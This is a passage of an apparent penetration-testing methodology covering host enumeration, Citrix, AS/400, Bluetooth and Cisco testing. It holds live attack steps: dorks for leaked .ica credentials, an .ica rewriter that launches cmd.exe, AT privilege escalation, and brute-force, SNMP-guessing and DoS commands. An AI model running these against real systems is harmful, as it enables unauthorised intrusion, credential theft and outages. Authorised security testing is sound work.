10.1. Default Port Lists

10.1.1. Windows

10.1.2. *nix

10.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.

10.2.1. General Enumeration Tools

10.2.1.1. nmap

10.2.1.1.1. nmap -n -A -PN -p- -T aggressive -iL nmap.targetlist -oX nmap.syn.results.xml

10.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

10.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

10.2.1.1.4. nmap -A -sS -PN -n --script=all --reason ip_address (the all category includes the intrusive and dos scripts; use --script=default,safe unless that is intended)

10.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list (pulls the address out of the "Host name (ip) appears to be up." line printed by older nmap releases; current releases print "Nmap scan report for" / "Host is up" instead, so parse -oG or -oX output rather than normal output)

10.2.1.2. netcat

10.2.1.2.1. nc -v -n IP_Address port

10.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

10.2.1.3. amap

10.2.1.3.1. amap -bqv 192.168.1.1 80

10.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

10.2.1.4. xprobe2

10.2.1.4.1. xprobe2 192.168.1.1

10.2.1.5. sinfp

10.2.1.5.1. ./sinfp.pl -i IP_Address -p port

10.2.1.6. nbtscan

10.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

10.2.1.7. hping

10.2.1.7.1. hping ip_address

10.2.1.8. scanrand

10.2.1.8.1. scanrand ip_address:all

10.2.1.9. unicornscan

10.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:'] IP_ADDRESS/CIDR_NET_MASK:S-E (S-E is the start-end port range)

10.2.1.10. netenum

10.2.1.10.1. netenum network/netmask timeout

10.2.1.11. fping

10.2.1.11.1. fping -a -d hostname, or fping -a -g Network/Subnet_Mask to sweep a range
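Parsing nmap's XML output into a live-host list and per-host open ports, as an added Python example (not part of the framework): it does what the grep/awk one-liner above does, but from the -oX file the first nmap command writes, so it keeps working across nmap versions whose normal-output wording differs, and it also carries the service and OS detail needed to pick targets for the port-specific sections of this document. SAMPLE_XML is a constructed two-host scan, not a real result.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX output for two hosts; not a real scan.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -n -A -Pn -p- -oX nmap.syn.results.xml">
  <host><status state="up" reason="syn-ack"/>
    <address addr="192.0.2.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="5.3p1"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.2.15"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered" reason="no-response"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.32" accuracy="96"/></os>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="192.0.2.6" addrtype="ipv4"/>
  </host>
</nmaprun>"""

def parse_nmap_xml(xml_text):
    """Return {ip: {"os": name_or_None, "ports": [(port, proto, service_desc)]}} for hosts that are up."""
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        open_ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue          # closed/filtered ports are not targets
            svc = port.find("service")
            desc = ""
            if svc is not None:
                desc = " ".join(x for x in (svc.get("name"), svc.get("product"), svc.get("version")) if x)
            open_ports.append((int(port.get("portid")), port.get("protocol"), desc))
        osmatch = host.find("os/osmatch")
        hosts[ip] = {"os": osmatch.get("name") if osmatch is not None else None,
                     "ports": sorted(open_ports)}
    return hosts

def live_hosts(xml_text):
    """Same result as the grep/awk one-liner, but read from the status element."""
    return sorted(parse_nmap_xml(xml_text))

def hosts_with_port(xml_text, port, proto="tcp"):
    """Targets for a port-specific section, e.g. every host with 3389/tcp open."""
    return sorted(ip for ip, h in parse_nmap_xml(xml_text).items()
                  if any(p == port and pr == proto for p, pr, _ in h["ports"]))

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for ip, h in parse_nmap_xml(text).items():
        print(ip, h["os"])
        for p, pr, desc in h["ports"]:
            print(f"  {p}/{pr} {desc}")
```

Run it as python parse_nmap.py nmap.syn.results.xml; with no argument it parses the embedded sample.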

10.2.2. Firewall Specific Tools

10.2.2.1. firewalk

10.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [gateway_IP] [internal_IP] (the gateway is the filtering device; the internal host is the metric beyond it)

10.2.2.2. ftester

10.2.2.2.1. on host 1 (behind the firewall): ./ftestd -i eth0 -v ; on host 2 (outside): ./ftest -f ftest.conf -v -d 0.01 ; then compare the two logs with ./freport ftest.log ftestd.log

10.2.3. Default Passwords (Examine list)

10.2.3.1. Passwords A

10.2.3.2. Passwords B

10.2.3.3. Passwords C

10.2.3.4. Passwords D

10.2.3.5. Passwords E

10.2.3.6. Passwords F

10.2.3.7. Passwords G

10.2.3.8. Passwords H

10.2.3.9. Passwords I

10.2.3.10. Passwords J

10.2.3.11. Passwords K

10.2.3.12. Passwords L

10.2.3.13. Passwords M

10.2.3.14. Passwords N

10.2.3.15. Passwords O

10.2.3.16. Passwords P

10.2.3.17. Passwords R

10.2.3.18. Passwords S

10.2.3.19. Passwords T

10.2.3.20. Passwords U

10.2.3.21. Passwords V

10.2.3.22. Passwords W

10.2.3.23. Passwords X

10.2.3.24. Passwords Y

10.2.3.25. Passwords Z

10.2.3.26. Passwords (Numeric)

10.3. Active Hosts

10.3.1. Open TCP Ports

10.3.2. Closed TCP Ports

10.3.3. Open UDP Ports

10.3.4. Closed UDP Ports

10.3.5. Service Probing

10.3.5.1. SMTP Mail Bouncing

10.3.5.2. Banner Grabbing

10.3.5.2.1. Other

10.3.5.2.2. HTTP

10.3.5.2.3. HTTPS

10.3.5.2.4. SMTP

10.3.5.2.5. POP3

10.3.5.2.6. FTP

10.3.6. ICMP Responses

10.3.6.1. Type 3 (Port Unreachable)

10.3.6.2. Type 8 (Echo Request)

10.3.6.3. Type 13 (Timestamp Request)

10.3.6.4. Type 15 (Information Request)

10.3.6.5. Type 17 (Subnet Address Mask Request)

10.3.6.6. Responses from broadcast address

10.3.7. Source Port Scans

10.3.7.1. TCP/UDP 53 (DNS)

10.3.7.2. TCP 20 (FTP Data)

10.3.7.3. TCP 80 (HTTP)

10.3.7.4. TCP/UDP 88 (Kerberos)

10.3.8. Firewall Assessment

10.3.8.1. Firewalk

10.3.8.2. TCP/UDP/ICMP responses

10.3.9. OS Fingerprint

14. Citrix Specific Testing

14.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information has been put together to help you conduct a vulnerability assessment/penetration test against Citrix.

14.2. Enumeration

14.2.1. web search

14.2.1.1. Google (GHDB)

14.2.1.1.1. ext:ica

14.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

14.2.1.1.3. [WFClient] Password= filetype:ica

14.2.1.1.4. inurl:citrix/metaframexp/default/login.asp?ClientDetection=On

14.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

14.2.1.1.6. inurl:/Citrix/Nfuse17/

14.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

14.2.1.2. Google Hacks (Author Discovered)

14.2.1.2.1. filetype:ica Username=

14.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx

14.2.1.2.3. inurl:/Citrix/AccessPlatform/

14.2.1.2.4. inurl:LogonAgent/Login.asp

14.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp

14.2.1.2.6. inurl:/Citrix/NFuse161/login.asp

14.2.1.2.7. inurl:/Citrix/NFuse16

14.2.1.2.8. inurl:/Citrix/NFuse151/

14.2.1.2.9. allintitle:MetaFrame XP Login

14.2.1.2.10. allintitle:MetaFrame Presentation Server Login

14.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

14.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login

14.2.1.3. Yahoo

14.2.1.3.1. originurlextension:ica

14.2.2. site search

14.2.2.1. Manual

14.2.2.1.1. review web page for useful information

14.2.2.1.2. review source for web page

14.2.3. generic

14.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

14.2.3.2. amap -bqv ip_address port_no.

14.2.4. citrix specific

14.2.4.1. enum.pl

14.2.4.1.1. perl enum.pl ip_address

14.2.4.2. enum.js

14.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address

14.2.4.3. connect.js

14.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application

14.2.4.4. Citrix-pa-scan

14.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

14.2.4.5. pabrute.c

14.2.4.5.1. ./pabrute pubapp list app_list ip_address

14.2.5. Default Ports

14.2.5.1. TCP

14.2.5.1.1. Citrix XML Service

14.2.5.1.2. Advanced Management Console

14.2.5.1.3. Citrix SSL Relay

14.2.5.1.4. ICA sessions

14.2.5.1.5. Server to server

14.2.5.1.6. Management Console to server

14.2.5.1.7. Session Reliability (Auto-reconnect)

14.2.5.1.8. License Management Console

14.2.5.1.9. License server

14.2.5.2. UDP

14.2.5.2.1. Clients to ICA browser service

14.2.5.2.2. Server-to-server

14.2.6. nmap nse scripts

14.2.6.1. citrix-enum-apps

14.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

14.2.6.2. citrix-enum-apps-xml

14.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

14.2.6.3. citrix-enum-servers

14.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604 <host>

14.2.6.4. citrix-enum-servers-xml

14.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

14.2.6.5. citrix-brute-xml

14.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

14.3. Scanning

14.3.1. Nessus

14.3.1.1. Plugins

14.3.1.1.1. CGI abuses

14.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

14.3.1.1.3. Misc.

14.3.1.1.4. Service Detection

14.3.1.1.5. Web Servers

14.3.1.1.6. Windows

14.3.2. Nikto

14.3.2.1. perl nikto.pl -host ip_address -port port_no.

14.4. Exploitation

14.4.1. Alter default .ica files

14.4.1.1. InitialProgram=cmd.exe (or the full path c:\windows\system32\cmd.exe)

14.4.1.2. InitialProgram=explorer.exe
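Altering a captured .ica file, as an added Python example (not the framework's own tooling): it reads the file as the INI it is, reports any stored Username/Password entries (the same values the filetype:ica Password= dork finds), and rewrites InitialProgram for every published application so the session lands in cmd.exe instead of the advertised program. SAMPLE_ICA, its addresses and the scrambled password value are constructed placeholders, not material from a real deployment.

```python
import configparser
import io

# Constructed .ica launch file of the kind the filetype:ica dorks turn up; not real.
SAMPLE_ICA = """[WFClient]
Version=2
ClientName=WI_abc123
TcpBrowserAddress=192.0.2.30

[ApplicationServers]
Notepad=

[Notepad]
Address=192.0.2.30
InitialProgram=#Notepad
Username=citrixuser
Domain=CORP
Password=004c3b2a6d7e5f1c2d
ClearPassword=
"""

def load_ica(text):
    """Parse an .ica file; key case is preserved so the client still recognises the keys."""
    cp = configparser.RawConfigParser()
    cp.optionxform = str
    cp.read_string(text)
    return cp

def leaked_credentials(cp):
    """Return (section, key, value) for every non-empty credential field in the file."""
    found = []
    for section in cp.sections():
        for key, value in cp.items(section):
            if key in ("Username", "Domain", "Password", "ClearPassword") and value:
                found.append((section, key, value))
    return found

def set_initial_program(cp, program="cmd.exe"):
    """Point every published application at `program`; returns the sections changed."""
    changed = []
    if not cp.has_section("ApplicationServers"):
        return changed
    for app, _ in cp.items("ApplicationServers"):
        if cp.has_section(app):
            cp.set(app, "InitialProgram", program)
            changed.append(app)
    return changed

def dump_ica(cp):
    """Serialise back to the key=value form the ICA client expects (no spaces around '=')."""
    buf = io.StringIO()
    cp.write(buf, space_around_delimiters=False)
    return buf.getvalue()

if __name__ == "__main__":
    cp = load_ica(SAMPLE_ICA)
    for section, key, value in leaked_credentials(cp):
        print(f"[{section}] {key}={value}")
    print("rewrote:", set_initial_program(cp))
    print(dump_ica(cp))
```

A stored Password= value is scrambled, not encrypted; even without unscrambling it, the file launches a session as that user, and the rewritten InitialProgram then decides what that session runs.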

14.4.2. Enumerate and Connect

14.4.2.1. For applications identified by Citrix-pa-scan

14.4.2.1.1. Pas

14.4.2.2. For published applications with a Citrix client when the master browser is non-public.

14.4.2.2.1. Citrix-pa-proxy

14.4.3. Manual Testing

14.4.3.1. Create Batch File (cmd.bat)

14.4.3.2. Host Scripting File (cmd.vbs)

14.4.3.2.1. Option Explicit

14.4.3.2.2. Dim objShell

14.4.3.2.3. Set objShell = CreateObject("WScript.Shell")

14.4.3.2.4. objShell.Run "%comspec% /k"

14.4.3.2.5. WScript.Quit

14.4.3.2.6. alternative functionality

14.4.3.3. iKat

14.4.3.3.1. Integrated Kiosk Attack Tool

14.4.3.4. AT Command - privilege escalation (the scheduler runs the job as SYSTEM on the interactive desktop; this works on Windows 2000/XP/2003 but not on Vista and later, where session 0 isolation applies)

14.4.3.4.1. AT HH:MM /interactive "cmd.exe"

14.4.3.4.2. AT HH:MM /interactive %comspec% /k

14.4.3.5. Keyboard Shortcuts/ Hotkeys

14.4.3.5.1. Ctrl + h – View History

14.4.3.5.2. Ctrl + n – New Browser

14.4.3.5.3. Shift + Left Click – New Browser

14.4.3.5.4. Ctrl + o – Internet Address (browse feature)

14.4.3.5.5. Ctrl + p – Print (to file)

14.4.3.5.6. Right Click (Shift + F10)

14.4.3.5.7. F1 – Jump to URL

14.4.3.5.8. SHIFT+F1: Local Task List

14.4.3.5.9. SHIFT+F2: Toggle Title Bar

14.4.3.5.10. SHIFT+F3: Close Remote Application

14.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

14.4.3.5.12. CTRL+F2: Remote Task List

14.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

14.4.3.5.14. ALT+F2: Cycle through programs

14.4.3.5.15. ALT+PLUS: Alt+TAB

14.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB

14.5. Brute Force

14.5.1. bforce.js

14.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

14.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

14.6. Review Configuration Files

14.6.1. Application server configuration file

14.6.1.1. appsrv.ini

14.6.1.1.1. Location

14.6.1.1.2. World writable

14.6.1.1.3. Review other files

14.6.1.1.4. Sample file

14.6.2. Program Neighborhood configuration file

14.6.2.1. pn.ini

14.6.2.1.1. Location

14.6.2.1.2. Review other files

14.6.2.1.3. Sample file

14.6.3. Citrix ICA client configuration file

14.6.3.1. wfclient.ini

14.6.3.1.1. Location

14.7. References

14.7.1. Vulnerabilities

14.7.1.1. Art of Hacking

14.7.1.2. Common Vulnerabilities and Exposures (CVE)

14.7.1.2.1. Sample file

14.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

14.7.1.3. OSVDB

14.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=search

14.7.1.4. Secunia

14.7.1.5. Security-database.com

14.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

14.7.1.6. SecurityFocus

14.7.2. Support

14.7.2.1. Citrix

14.7.2.1.1. Knowledge Base

14.7.2.2. Thinworld

14.7.3. Exploits

14.7.3.1. Milw0rm

14.7.3.1.1. http://www.milw0rm.com/search.php

14.7.3.2. Art of Hacking

14.7.3.2.1. Citrix

14.7.4. Tools Resource

14.7.4.1. Zip file containing the majority of the tools mentioned in this section, for easy download/access

15. Network Backbone

15.1. Generic Toolset

15.1.1. Wireshark (Formerly Ethereal)

15.1.1.1. Passive Sniffing

15.1.1.1.1. Usernames/Passwords

15.1.1.1.2. Email

15.1.1.1.3. FTP

15.1.1.1.4. HTTP

15.1.1.1.5. HTTPS

15.1.1.1.6. RDP

15.1.1.1.7. VOIP

15.1.1.1.8. Other

15.1.1.2. Filters

15.1.1.2.1. ip.src == ip_address

15.1.1.2.2. ip.dst == ip_address

15.1.1.2.3. tcp.dstport == port_no.

15.1.1.2.4. ! ip.addr == ip_address

15.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

15.1.2. Cain & Abel

15.1.2.1. Active Sniffing

15.1.2.1.1. ARP Cache Poisoning

15.1.2.1.2. DNS Poisoning

15.1.2.1.3. Routing Protocols

15.1.3. Cisco-Torch

15.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

15.1.4. NTP-Fingerprint

15.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

15.1.5. Yersinia

15.1.6. p0f

15.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

15.1.7. Manual Check (Credentials required)

15.1.8. MAC Spoofing

15.1.8.1. mac address changer for windows

15.1.8.2. macchanger

15.1.8.2.1. Random Mac Address:- macchanger -r eth0

15.1.8.3. madmacs

15.1.8.4. smac

15.1.8.5. TMAC

16. Penetration - An exploit takes advantage of a flaw or vulnerability in an application or operating system that, when triggered, can lead to privilege escalation or denial of service against the system under attack. Exploits can be compiled and used manually, or run from frameworks that, at their simplest, are pre-compiled point-and-shoot tools; these frameworks also offer a number of additional features for more advanced users.

16.1. Password Attacks

16.1.1. Known Accounts

16.1.1.1. Identified Passwords

16.1.1.2. Unidentified Hashes

16.1.2. Default Accounts

16.1.2.1. Identified Passwords

16.1.2.2. Unidentified Hashes

16.2. Exploits

16.2.1. Successful Exploits

16.2.1.1. Accounts

16.2.1.1.1. Passwords

16.2.1.1.2. Groups

16.2.1.1.3. Other Details

16.2.1.2. Services

16.2.1.3. Backdoor

16.2.1.4. Connectivity

16.2.2. Unsuccessful Exploits

16.2.3. Resources

16.2.3.1. Securiteam

16.2.3.1.1. Exploits are sorted by year and must be downloaded individually

16.2.3.2. SecurityForest

16.2.3.2.1. Updated via CVS after initial install

16.2.3.3. GovernmentSecurity

16.2.3.3.1. Need to create an account to obtain access

16.2.3.4. Red Base Security

16.2.3.4.1. Oracle Exploit site only

16.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

16.2.3.5.1. Wireless Exploit Site

16.2.3.6. PacketStorm Security

16.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

16.2.3.7. SecWatch

16.2.3.7.1. Exploits sorted by year and month, download separately

16.2.3.8. SecurityFocus

16.2.3.8.1. Exploits must be downloaded individually

16.2.3.9. Metasploit

16.2.3.9.1. Install and regularly update via svn

16.2.3.10. Milw0rm

16.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!

16.3. Tools

16.3.1. Metasploit

16.3.1.1. Free Extra Modules

16.3.1.1.1. local copy

16.3.2. Manual SQL Injection

16.3.2.1. Understanding SQL Injection

16.3.2.2. SQL Injection walkthrough

16.3.2.3. SQL Injection by example

16.3.2.4. Blind SQL Injection

16.3.2.5. Advanced SQL Injection in SQL Server

16.3.2.6. More Advanced SQL Injection

16.3.2.7. Advanced SQL Injection in Oracle databases

16.3.2.8. SQL Cheatsheets

16.3.3. SQL Power Injector

16.3.4. SecurityForest

16.3.5. SPI Dynamics WebInspect

16.3.6. Core Impact

16.3.7. Cisco Global Exploiter

16.3.8. PIXDos

16.3.8.1. perl PIXdos.pl [--device=interface] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]

16.3.9. CANVAS

16.3.10. Inguma

17. Contributors

17.1. Matt Byrne (WirelessDefence.org)

17.1.1. Matt contributed the majority of the Wireless section.

17.2. Arvind Doraiswamy (Paladion.net)

17.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

17.3. Lee Lawson (Dns.co.uk)

17.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

17.4. Nabil OUCHN (Security-database.com)

18. Vulnerability Assessment - Using vulnerability scanners, all discovered hosts can be tested for vulnerabilities. The results are then analysed to determine whether any of them could be exploited to gain access to a target host on the network. Many of the tests these scanners carry out are just banner grabbing/obtaining version information; once known, the version is compared with published Common Vulnerabilities and Exposures (CVE) entries and the matches are reported to the user. Other checks use manual pen-testing methods and display the output received, e.g. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.

18.1. Manual

18.1.1. Patch Levels

18.1.2. Confirmed Vulnerabilities

18.1.2.1. Severe

18.1.2.2. High

18.1.2.3. Medium

18.1.2.4. Low

18.2. Automated

18.2.1. Reports

18.2.2. Vulnerabilities

18.2.2.1. Severe

18.2.2.2. High

18.2.2.3. Medium

18.2.2.4. Low

18.3. Tools

18.3.1. GFI

18.3.2. Nessus (Linux)

18.3.2.1. Nessus (Windows)

18.3.3. NGS Typhon

18.3.4. NGS Squirrel for Oracle

18.3.5. NGS Squirrel for SQL

18.3.6. SARA

18.3.7. MatriXay

18.3.8. BiDiBlah

18.3.9. SSA

18.3.10. Oval Interpreter

18.3.11. Xscan

18.3.12. Security Manager +

18.3.13. Inguma

18.4. Resources

18.4.1. Security Focus

18.4.2. Microsoft Security Bulletin

18.4.3. Common Vulnerabilities and Exposures (CVE)

18.4.4. National Vulnerability Database (NVD)

18.4.5. The Open Source Vulnerability Database (OSVDB)

18.4.5.1. Standalone Database

18.4.5.1.1. Update URL

18.4.6. United States Computer Emergency Response Team (US-CERT)

18.4.7. Computer Emergency Response Team

18.4.8. Mozilla Security Information

18.4.9. SANS

18.4.10. Securiteam

18.4.11. PacketStorm Security

18.4.12. Security Tracker

18.4.13. Secunia

18.4.14. Vulnerabilities.org

18.4.15. ntbugtraq

18.4.16. Wireless Vulnerabilities and Exploits (WVE)

18.5. Blogs

18.5.1. Carnal0wnage

18.5.2. Fsecure Blog

18.5.3. g0ne blog

18.5.4. GNUCitizen

18.5.5. ha.ckers Blog

18.5.6. Jeremiah Grossman Blog

18.5.7. Metasploit

18.5.8. nCircle Blogs

18.5.9. pentestmonkey.net

18.5.10. Rational Security

18.5.12. Rise Security

18.5.13. Security Fix Blog

18.5.14. Software Vulnerability Exploitation Blog

18.5.16. Taosecurity Blog

19. AS/400 Auditing

19.1. Remote

19.1.1. Information Gathering

19.1.1.1. Nmap using common iSeries (AS/400) services.

19.1.1.1.1. Unsecured services (Port;name;description)

19.1.1.1.2. Secured services (Port;name;description)

19.1.1.2. NetCat (old school technique)

19.1.1.2.1. nc -v -z -w 3 target $(cat ListOfServices.txt) 2>&1 | grep open (ListOfServices.txt holds one port number per line; -w needs a timeout in seconds, and nc reports to stderr)

19.1.1.3. Banners Grabbing

19.1.1.3.1. Telnet

19.1.1.3.2. FTP

19.1.1.3.3. HTTP Banner

19.1.1.3.4. POP3

19.1.1.3.5. SNMP

19.1.1.3.6. SMTP

19.1.2. Users Enumeration

19.1.2.1. Default AS/400 users accounts

19.1.2.2. Error messages

19.1.2.2.1. Telnet Login errors

19.1.2.2.2. POP3 authentication Errors

19.1.2.3. Qsys symbolic link (if ftp is enabled)

19.1.2.3.1. ftp target (then, at the ftp> prompt): quote stat ; quote site namefmt 1

19.1.2.3.2. cd /

19.1.2.3.3. quote site listfmt 1

19.1.2.3.4. mkdir temp

19.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

19.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

19.1.2.3.7. dir /temp/qsys/*.usrprf

19.1.2.4. LDAP

19.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

19.1.2.4.2. Tool to browse LDAP

19.1.3. Exploitation

19.1.3.1. CVE References

19.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

19.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

19.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

19.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

19.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

19.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

19.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

19.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

19.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

19.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

19.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

19.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

19.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

19.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

19.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

19.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

19.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

19.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

19.1.3.2. Access with Work Station Gateway

19.1.3.2.1. http://target:5061/WSG

19.1.3.2.2. Default AS/400 accounts.

19.1.3.3. Network attacks (next release)

19.1.3.3.1. DB2

19.1.3.3.2. QSHELL

19.1.3.3.3. Hijacking Terminals

19.1.3.3.4. Trojan attacks

19.1.3.3.5. Hacking from AS/400

19.2. Local

19.2.1. System Value Security

19.2.1.4.1. Recommended value is 30

19.2.2. Password Policy

19.2.3. Audit level

19.2.3.1.1. Recommended value is *SECURITY

19.2.4. Documentation

19.2.4.1. Users class

19.2.4.2. System Audit Settings

19.2.4.3. Special Authorities Definitions

20. Bluetooth Specific Testing

20.1. Bluescanner

20.2. Bluesweep

20.3. btscanner

20.4. Redfang

20.5. Blueprint

20.6. Bluesnarfer

20.7. Bluebugger

20.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

20.8. Blueserial

20.9. Bloover

20.10. Bluesniff

20.11. Exploit Frameworks

20.11.1. BlueMaho

20.12. Resources

20.12.1. URL's

20.12.1.1. BlueStumbler.org

20.12.1.2. Bluejackq.com

20.12.1.3. Bluejacking.com

20.12.1.4. Bluejackers

20.12.1.5. bluetooth-pentest

20.12.1.6. ibluejackedyou.com

20.12.1.7. Trifinite

20.12.2. Vulnerability Information

20.12.2.1. Common Vulnerabilities and Exposures (CVE)

20.12.2.1.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

20.12.3. White Papers

20.12.3.1. Bluesnarfing

21. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt

22. Cisco Specific Testing

22.1. Methodology

22.1.1. Scan & Fingerprint.

22.1.1.3. If SNMP is active, then community string guessing should be performed.

22.1.2. Credentials Guessing.

22.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

22.1.3. Connect

22.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

22.1.4. Check for bugs

22.1.4.1.1. The most widely known/used are: Nessus, Retina, GFI LanGuard and Core Impact.

22.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

22.1.5. Further your attack

22.1.5.1.1. running-config is the currently running configuration. It is loaded from the startup-config on boot, is editable, and changes take effect immediately, but they are lost once the router is rebooted. It is this file that needs altering to maintain a non-permanent connection through to the internal network.

22.1.5.1.2. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.

22.1.5.2.1. (config)# access-list 100 permit ip <IP> any (the list only takes effect once applied to an interface with ip access-group 100 in)

22.2. Scan & Fingerprint.

22.2.1. Port Scanning

22.2.1.1. nmap

22.2.1.2. Other tools

22.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

22.2.2. Fingerprinting

22.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

22.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

22.3. Password Guessing.

22.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

22.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

22.3.3.1. BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

22.4. SNMP Attacks.

22.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

22.4.2.1. onesixtyone -c SNMP.wordlist <IP>

22.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
Scanning 1 hosts, 64 communities
